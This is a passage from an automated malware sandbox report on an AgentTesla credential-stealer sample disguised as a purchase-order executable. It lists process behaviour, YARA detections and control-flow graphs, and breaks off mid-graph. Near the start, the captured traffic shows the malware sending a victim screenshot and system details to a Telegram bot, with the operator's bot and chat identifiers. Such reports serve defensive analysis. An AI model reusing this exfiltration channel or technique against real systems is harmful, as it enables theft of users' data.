4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:55:02 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:55:02 UTC1358OUTData Raw: 28 a2 98 05 14 51 40 1a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33 c0 1d aa 39 75 cb e9 e7 86 7b 89 3c f9 a2 b6 92 db cc 94 b3 33 2b 87 04 92 4f 24 09 0e 3e 82 b3 28 a4 17 0a 28 a2 80 0a 28 a2 98 1d 74 de 31 8a e6 38 92 5b 47 8f cb 5c 02 ac 1b 3f cb 1d 2a 49 bc 6d 0c f1 79 4d a6 98 81 ea eb 20 63 f9 60 7f 3a e3 68 ac 95 28 25 04 97 c3 aa df bd c6 e4 db 93 fe 6d ce 8b 58 f1 2a ea 3a 42 e9 c9 6c ca aa e1 bc c6 6e 4e 33 db 1e fe b5 ce d1 45 54 62 a3 7b 75 77 06 db b2 7d 02 8a 28 aa 11 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a eb b4 dd 4e ee e1 b6 bd e0 10 20 cb c8 76 83 8f 4d dd 7f 5a f3 3a 2b 9e a5 17 24 d4 25 6b 99 c6 9a 8c f9 ba 76 3b 7f 15 78 9e 07 b5 7b 0b 09 04 86 41 89 24 5e 80 7a 0f 5a e2 28 a2 8c 3e 1e 18 78 72 40 e8 a9 51 d4
                                                                                      Data Ascii: (Q@>'..V/1q\:39u{<3+O$>(((t18[G\?*ImyM c`:h(%mX*:BlnN3ETb{uw}(j"X'm+zN vMZ:+$%kv;x{A$^zZ(>xr@Q
                                                                                      2024-12-06 04:55:02 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 38 32 31 61 30 38 34 31 33 61 32 34 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd821a08413a24--
                                                                                      2024-12-06 04:55:03 UTC1504INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:55:02 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1115
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170425,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460902,"document":{"file_name":"user-610930 2025-04-23 03-50-47.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZuWdSg6a8oPm4UZdvXl3HiFo8XBbeAAMVAAI6HplSgdPLuq-AYIYBAAdtAAM2BA","file_unique_id":"AQAEFQACOh6ZUnI","file_size":12290,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZuWdSg6a8oPm4UZdvXl3HiFo8XBbeAAMVAAI6HplSgdPLuq-AYIYBAAdtAAM2BA","file_unique_id":"AQAEFQACOh6ZUnI","file_size":12290,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmblnUoOmvKD5uFGXb15dx4haPFwW3gADFQACOh6ZUoHTy7qvgGCGNgQ","file_unique_id":"AgAEFQACOh6ZUg","file_size":66323},"caption":"New SC Recovered!\n\nTime: 04/23/2025 03:30:47\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 M [TRUNCATED]


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:23:50:53
                                                                                      Start date:05/12/2024
                                                                                      Path:C:\Users\user\Desktop\PO54782322024.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\Desktop\PO54782322024.exe"
                                                                                      Imagebase:0x17f04180000
                                                                                      File size:528'896 bytes
                                                                                      MD5 hash:5DC11C53470282CA41404226EAD4ECCD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1905674318.0000017F15F18000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1905005575.0000017F05F4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:23:50:53
                                                                                      Start date:05/12/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:23:50:54
                                                                                      Start date:05/12/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                      Imagebase:0x660000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.4115057036.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4116925393.0000000002AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:5
                                                                                      Start time:23:50:54
                                                                                      Start date:05/12/2024
                                                                                      Path:C:\Windows\System32\WerFault.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 6844 -s 1068
                                                                                      Imagebase:0x7ff710010000
                                                                                      File size:570'736 bytes
                                                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:23:51:07
                                                                                      Start date:05/12/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
                                                                                      Imagebase:0xda0000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:23:51:07
                                                                                      Start date:05/12/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:23:51:15
                                                                                      Start date:05/12/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe"
                                                                                      Imagebase:0xb00000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:10
                                                                                      Start time:23:51:15
                                                                                      Start date:05/12/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:9.3%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:12
                                                                                        Total number of Limit Nodes:2
                                                                                        execution_graph 15589 7ffd9b871a52 15590 7ffd9b871a6b VirtualProtect 15589->15590 15591 7ffd9b8719fa 15589->15591 15593 7ffd9b871b12 15590->15593 15580 7ffd9b870d60 15581 7ffd9b870d69 15580->15581 15582 7ffd9b870d17 FreeConsole 15581->15582 15584 7ffd9b870d7c 15581->15584 15583 7ffd9b870d2e 15582->15583 15585 7ffd9b877f1d 15586 7ffd9b877f2f VirtualProtect 15585->15586 15588 7ffd9b8868a1 15586->15588
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907444028.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b950000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 912779f1b0543304afdc7f8a0bd92b751144c0fe7c2cdc6806a5d4b7a1e046ae
                                                                                        • Instruction ID: c97a2b6db3861d6c388df594f670558525db99f091a0e31ccf102a789002a162
                                                                                        • Opcode Fuzzy Hash: 912779f1b0543304afdc7f8a0bd92b751144c0fe7c2cdc6806a5d4b7a1e046ae
                                                                                        • Instruction Fuzzy Hash: DBE25D71A1F7C95FEB66CBA888755A47FA0EF53700F0A01FAD488CB1E3DA646946C341

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 523 7ffd9b872a2c-7ffd9b872a33 524 7ffd9b872a3e-7ffd9b872a8e 523->524 525 7ffd9b872a35-7ffd9b872a3d 523->525 526 7ffd9b872a94-7ffd9b872b20 call 7ffd9b872080 524->526 527 7ffd9b872d06-7ffd9b872d39 524->527 525->524 559 7ffd9b872b82-7ffd9b872b95 526->559 534 7ffd9b872d43-7ffd9b872d5e 527->534 535 7ffd9b872d3b-7ffd9b872d42 527->535 539 7ffd9b872d92-7ffd9b872dc1 534->539 540 7ffd9b872d60-7ffd9b872d62 534->540 535->534 556 7ffd9b872dc4-7ffd9b872dfa 539->556 541 7ffd9b872d64-7ffd9b872d67 call 7ffd9b872150 540->541 542 7ffd9b872d6c-7ffd9b872d72 540->542 541->542 544 7ffd9b872d74-7ffd9b872d7a 542->544 545 7ffd9b872d81-7ffd9b872d91 542->545 548 7ffd9b872d7d-7ffd9b872d80 544->548 549 7ffd9b872d7c 544->549 548->545 549->548 556->556 557 7ffd9b872dfc 556->557 560 7ffd9b872b22-7ffd9b872b79 call 7ffd9b8723b0 * 2 call 7ffd9b8723b8 559->560 561 7ffd9b872b97-7ffd9b872b99 559->561 594 7ffd9b872b80 560->594 562 7ffd9b872bf2-7ffd9b872c05 561->562 564 7ffd9b872b9b-7ffd9b872bf0 call 7ffd9b8723b0 * 2 call 7ffd9b870378 562->564 565 7ffd9b872c07-7ffd9b872c09 562->565 564->562 567 7ffd9b872cae-7ffd9b872cc1 565->567 572 7ffd9b872c0e-7ffd9b872c40 call 7ffd9b8723b0 567->572 573 7ffd9b872cc7-7ffd9b872cdd 567->573 584 7ffd9b872c42-7ffd9b872c58 572->584 585 7ffd9b872c5a-7ffd9b872c5b 572->585 582 7ffd9b872cdf 573->582 583 7ffd9b872ce0-7ffd9b872d05 573->583 582->583 587 7ffd9b872c5d-7ffd9b872ca7 call 7ffd9b8707a8 call 7ffd9b872158 584->587 585->587 597 7ffd9b872cac 587->597 594->559 597->567
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: fish
                                                                                        • API String ID: 0-1064584243
                                                                                        • Opcode ID: 6e8f1c7db1c5d5dcb0223d55b0289c8f124a32b9f2bfbeabe790dba3c08c2cc7
                                                                                        • Instruction ID: 31ac6bb3621b057aa88e1a77db2994fc6e098cb29fe66b60c291576df2737a21
                                                                                        • Opcode Fuzzy Hash: 6e8f1c7db1c5d5dcb0223d55b0289c8f124a32b9f2bfbeabe790dba3c08c2cc7
                                                                                        • Instruction Fuzzy Hash: 24D17C31B1EA4E0FE76DEF6888A557577E1EF9A314B0501BED48BC71E3DD24A8068381

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 725 7ffd9b87d34d-7ffd9b87d3ae 730 7ffd9b87d3b0-7ffd9b87d3b5 725->730 731 7ffd9b87d41f-7ffd9b87d435 call 7ffd9b879890 725->731 732 7ffd9b87d3b7-7ffd9b87d3d1 call 7ffd9b875b30 730->732 733 7ffd9b87d436-7ffd9b87d44a 730->733 742 7ffd9b87d44f-7ffd9b87d45a 731->742 743 7ffd9b87d437-7ffd9b87d44a 731->743 736 7ffd9b87d4e8-7ffd9b87d4ea 733->736 739 7ffd9b87d4ec-7ffd9b87d4f1 736->739 740 7ffd9b87d55b-7ffd9b87d55d 736->740 744 7ffd9b87d4f3-7ffd9b87d50f 739->744 745 7ffd9b87d572 739->745 740->745 748 7ffd9b87d471-7ffd9b87d47c 742->748 749 7ffd9b87d45c-7ffd9b87d46f 742->749 743->736 746 7ffd9b87d574-7ffd9b87d575 745->746 747 7ffd9b87d578-7ffd9b87d5c6 call 7ffd9b879890 * 2 call 7ffd9b875790 745->747 746->747 761 7ffd9b87d5cc-7ffd9b87d5ea 747->761 762 7ffd9b87d749-7ffd9b87d7a3 747->762 752 7ffd9b87d492-7ffd9b87d4a0 748->752 753 7ffd9b87d47e-7ffd9b87d490 748->753 749->736 752->736 753->736 761->762 763 7ffd9b87d5f0-7ffd9b87d60a 761->763 778 7ffd9b87d7a9-7ffd9b87d804 call 7ffd9b879890 * 2 call 7ffd9b875790 762->778 779 7ffd9b87d8d6-7ffd9b87d933 762->779 765 7ffd9b87d663-7ffd9b87d688 763->765 766 7ffd9b87d60c-7ffd9b87d60f 763->766 770 7ffd9b87d6a1-7ffd9b87d6b6 765->770 771 7ffd9b87d68a-7ffd9b87d68f 765->771 767 7ffd9b87d611-7ffd9b87d630 766->767 768 7ffd9b87d690-7ffd9b87d69a 766->768 767->770 772 7ffd9b87d632-7ffd9b87d637 767->772 774 7ffd9b87d6ce-7ffd9b87d71f call 7ffd9b87a260 768->774 775 7ffd9b87d69c-7ffd9b87d69f 768->775 776 7ffd9b87d6b8-7ffd9b87d6c9 770->776 771->768 772->776 777 7ffd9b87d639-7ffd9b87d662 call 7ffd9b875b30 772->777 774->762 788 7ffd9b87d721-7ffd9b87d748 774->788 775->774 776->774 780 7ffd9b87d6cb-7ffd9b87d6cc 776->780 777->765 778->779 803 7ffd9b87d80a-7ffd9b87d860 778->803 789 7ffd9b87d9ee-7ffd9b87d9f9 779->789 790 7ffd9b87d939-7ffd9b87d98e call 7ffd9b879890 * 2 call 7ffd9b875790 779->790 780->774 797 7ffd9b87d9fe-7ffd9b87da1a 789->797 798 7ffd9b87d9fb-7ffd9b87d9fd 789->798 790->789 814 7ffd9b87d990-7ffd9b87d9b4 790->814 804 7ffd9b87da64-7ffd9b87daa6 call 7ffd9b879890 * 2 call 7ffd9b875790 797->804 805 7ffd9b87da1c-7ffd9b87da47 797->805 798->797 803->779 807 7ffd9b87d862-7ffd9b87d8ad call 7ffd9b87a260 803->807 809 7ffd9b87dbdb-7ffd9b87dc0a 804->809 832 7ffd9b87daac-7ffd9b87daca 804->832 808 7ffd9b87da4d-7ffd9b87da63 805->808 805->809 807->779 816 7ffd9b87d8af-7ffd9b87d8d5 807->816 808->804 826 7ffd9b87dc54-7ffd9b87dc93 call 7ffd9b879890 * 2 call 7ffd9b875790 809->826 827 7ffd9b87dc0c-7ffd9b87dc37 809->827 819 7ffd9b87d9e2-7ffd9b87d9ed 814->819 820 7ffd9b87d9b6-7ffd9b87d9c6 814->820 820->789 823 7ffd9b87d9c8-7ffd9b87d9df 820->823 823->819 830 7ffd9b87dd97-7ffd9b87ddc9 826->830 856 7ffd9b87dc99-7ffd9b87dcb4 826->856 829 7ffd9b87dc3d-7ffd9b87dc53 827->829 827->830 829->826 851 7ffd9b87de13-7ffd9b87de3c call 7ffd9b879890 830->851 852 7ffd9b87ddcb-7ffd9b87ddf6 830->852 832->809 834 7ffd9b87dad0-7ffd9b87daea 832->834 835 7ffd9b87db43-7ffd9b87db47 834->835 836 7ffd9b87daec-7ffd9b87daef 834->836 842 7ffd9b87db49-7ffd9b87db6f call 7ffd9b875b30 835->842 843 7ffd9b87dbc8-7ffd9b87dbda 835->843 839 7ffd9b87daf1-7ffd9b87db0a 836->839 840 7ffd9b87db70-7ffd9b87dbaf call 7ffd9b87a260 836->840 845 7ffd9b87db23-7ffd9b87db34 839->845 846 7ffd9b87db0c-7ffd9b87db21 839->846 858 7ffd9b87dbb1 840->858 842->840 850 7ffd9b87db38-7ffd9b87db40 845->850 846->850 857 7ffd9b87db42 850->857 850->858 877 7ffd9b87dea1-7ffd9b87dec4 851->877 878 7ffd9b87de3e-7ffd9b87de4c 851->878 859 7ffd9b87ddfc-7ffd9b87de0f 852->859 860 7ffd9b87dec5-7ffd9b87ded7 852->860 864 7ffd9b87dd0d-7ffd9b87dd14 856->864 865 7ffd9b87dcb6-7ffd9b87dcb9 856->865 857->835 858->809 863 7ffd9b87dbb3-7ffd9b87dbc6 858->863 859->851 875 7ffd9b87df19-7ffd9b87df27 860->875 876 7ffd9b87ded9-7ffd9b87defa 860->876 863->843 864->830 871 7ffd9b87dd1a-7ffd9b87dd37 864->871 868 7ffd9b87dcbb-7ffd9b87dcd9 865->868 869 7ffd9b87dd3a-7ffd9b87dd49 865->869 873 7ffd9b87dcdb-7ffd9b87dce0 868->873 874 7ffd9b87dd4a-7ffd9b87dd5e call 7ffd9b87a260 868->874 869->874 871->869 879 7ffd9b87dce2-7ffd9b87dd06 call 7ffd9b875b30 873->879 880 7ffd9b87dd61-7ffd9b87dd6d 873->880 874->880 882 7ffd9b87e083-7ffd9b87e099 875->882 883 7ffd9b87df2d-7ffd9b87df41 875->883 888 7ffd9b87df44-7ffd9b87df7f call 7ffd9b879890 * 2 call 7ffd9b87b9f0 876->888 889 7ffd9b87defc-7ffd9b87df16 876->889 877->860 878->877 879->864 880->830 891 7ffd9b87dd6f-7ffd9b87dd96 880->891 896 7ffd9b87e09b-7ffd9b87e0b0 882->896 897 7ffd9b87e09a 882->897 883->888 909 7ffd9b87df81-7ffd9b87df97 888->909 910 7ffd9b87df99-7ffd9b87dfa4 888->910 889->875 904 7ffd9b87e0b1-7ffd9b87e0e9 896->904 897->896 907 7ffd9b87e0ff 904->907 908 7ffd9b87e0eb-7ffd9b87e0fd call 7ffd9b870388 904->908 911 7ffd9b87e104-7ffd9b87e106 907->911 908->911 909->910 921 7ffd9b87dfb6 910->921 922 7ffd9b87dfa6-7ffd9b87dfb4 910->922 915 7ffd9b87e11a-7ffd9b87e191 911->915 916 7ffd9b87e108-7ffd9b87e113 911->916 946 7ffd9b87e278-7ffd9b87e27f 915->946 947 7ffd9b87e197-7ffd9b87e20f 915->947 916->915 923 7ffd9b87dfb8-7ffd9b87dfbd 921->923 922->923 925 7ffd9b87dfe0-7ffd9b87dff6 923->925 926 7ffd9b87dfbf-7ffd9b87dfde call 7ffd9b870810 923->926 933 7ffd9b87e00a-7ffd9b87e01f call 7ffd9b87c3e0 925->933 934 7ffd9b87dff8-7ffd9b87dffe 925->934 932 7ffd9b87e023-7ffd9b87e029 926->932 932->897 938 7ffd9b87e02b-7ffd9b87e030 932->938 933->932 935 7ffd9b87e001-7ffd9b87e009 934->935 936 7ffd9b87e000 934->936 935->933 936->935 938->904 941 7ffd9b87e032-7ffd9b87e060 call 7ffd9b875b30 call 7ffd9b875790 938->941 941->882 954 7ffd9b87e062-7ffd9b87e082 941->954 949 7ffd9b87e281-7ffd9b87e28e 946->949 950 7ffd9b87e29c-7ffd9b87e2ac 946->950 964 7ffd9b87e211-7ffd9b87e217 call 7ffd9b877748 947->964 965 7ffd9b87e26f-7ffd9b87e277 call 7ffd9b87e2c4 947->965 949->950 955 7ffd9b87e290-7ffd9b87e29a 949->955 956 7ffd9b87e2b2-7ffd9b87e2c3 950->956 955->950 969 7ffd9b87e21c-7ffd9b87e26e 964->969 965->946 969->965
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f045e3be0efd2c9b157a8feea9d5ce62c95ef117ba5ce3d1c1f751c260a08326
                                                                                        • Instruction ID: 01822af15d0ca5763e43a904571c2ce81560a07268be311d668337044d5d9ccd
                                                                                        • Opcode Fuzzy Hash: f045e3be0efd2c9b157a8feea9d5ce62c95ef117ba5ce3d1c1f751c260a08326
                                                                                        • Instruction Fuzzy Hash: A5B29830A0DB494FD369DB28C4A14B5B7E2FFD9305B0445BEE48AC72A6DE34E946C781
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c8beb3439ce5921a61f99c5af7750fcd62e09a2449b8411b2d55596325536c0b
                                                                                        • Instruction ID: 14d4f8e5f5b0d498e6f63dc9d46da6724c2db48850c5da1bf901b9c4e594c30b
                                                                                        • Opcode Fuzzy Hash: c8beb3439ce5921a61f99c5af7750fcd62e09a2449b8411b2d55596325536c0b
                                                                                        • Instruction Fuzzy Hash: 83A25731A1DB4E8FE319DB28C4A44B5B7E1FF99309B1545BED08AC72A2DE34E946C740
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1907217153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ffd9b870000_PO54782322024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ecc7b7cfb7fd58bc7ca7ad50ee9d57e693b0c39d675f889f13df0d3eda9e1683
                                                                                        • Instruction ID: cd879faf6aacb7aff3a2021830338cfaf36eb087e0ddf9eed1f20a61ea52ff0b
                                                                                        • Opcode Fuzzy Hash: ecc7b7cfb7fd58bc7ca7ad50ee9d57e693b0c39d675f889f13df0d3eda9e1683
                                                                                        • Instruction Fuzzy Hash: 2BA2D571A0E68D8FDBA8DB68C4A5A7877E1FF59304F5500BDD04EC72A2DA38AD41CB41

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1755 7ffd9b87bc7a-7ffd9b87bc8e 1757 7ffd9b87bc90-7ffd9b87bc96 1755->1757 1758 7ffd9b87bc98-7ffd9b87bc99 1755->1758 1759 7ffd9b87bc9b-7ffd9b87bcbe 1757->1759 1758->1759 1761 7ffd9b87bd13-7ffd9b87bd1e 1759->1761 1762 7ffd9b87bcc0-7ffd9b87bcc6 1761->1762 1763 7ffd9b87bd20-7ffd9b87bd37 1761->1763 1764 7ffd9b87c262-7ffd9b87c2ad call 7ffd9b8779b8 1762->1764 1765 7ffd9b87bccc-7ffd9b87bd10 call 7ffd9b877bf0 1762->1765 1769 7ffd9b87bd39-7ffd9b87bd5f call 7ffd9b877bf0 1763->1769 1770 7ffd9b87bd66-7ffd9b87bec0 call 7ffd9b877700 1763->1770 1794 7ffd9b87c2ae-7ffd9b87c2b7 1764->1794 1765->1761 1769->1770 1782 7ffd9b87bec2-7ffd9b87bec8 1770->1782 1783 7ffd9b87bf10-7ffd9b87bf1f 1770->1783 1785 7ffd9b87beca-7ffd9b87bee5 1782->1785 1786 7ffd9b87bee7-7ffd9b87beff 1782->1786 1791 7ffd9b87bf21-7ffd9b87bf2a 1783->1791 1792 7ffd9b87bf2c 1783->1792 1785->1786 1790 7ffd9b87bf08-7ffd9b87bf0b 1786->1790 1795 7ffd9b87c0b8-7ffd9b87c0cd 1790->1795 1796 7ffd9b87bf2e-7ffd9b87bf33 1791->1796 1792->1796 1798 7ffd9b87c301-7ffd9b87c30b 1794->1798 1799 7ffd9b87c2b9-7ffd9b87c2f1 call 7ffd9b873138 1794->1799 1804 7ffd9b87c0cf-7ffd9b87c10b 1795->1804 1805 7ffd9b87c10d 1795->1805 1801 7ffd9b87c23f-7ffd9b87c240 1796->1801 1802 7ffd9b87bf39-7ffd9b87bf3c 1796->1802 1808 7ffd9b87c30d-7ffd9b87c315 1798->1808 1809 7ffd9b87c316-7ffd9b87c327 1798->1809 1850 7ffd9b87c2f3-7ffd9b87c2fb 1799->1850 1851 7ffd9b87c2fc-7ffd9b87c2ff 1799->1851 1803 7ffd9b87c243-7ffd9b87c24a 1801->1803 1806 7ffd9b87bf84 1802->1806 1807 7ffd9b87bf3e-7ffd9b87bf5b call 7ffd9b870388 1802->1807 1803->1794 1819 7ffd9b87c24c-7ffd9b87c252 1803->1819 1814 7ffd9b87c10f-7ffd9b87c114 1804->1814 1805->1814 1812 7ffd9b87bf86-7ffd9b87bf8b 1806->1812 1807->1806 1846 7ffd9b87bf5d-7ffd9b87bf73 1807->1846 1808->1809 1816 7ffd9b87c332-7ffd9b87c36d 1809->1816 1817 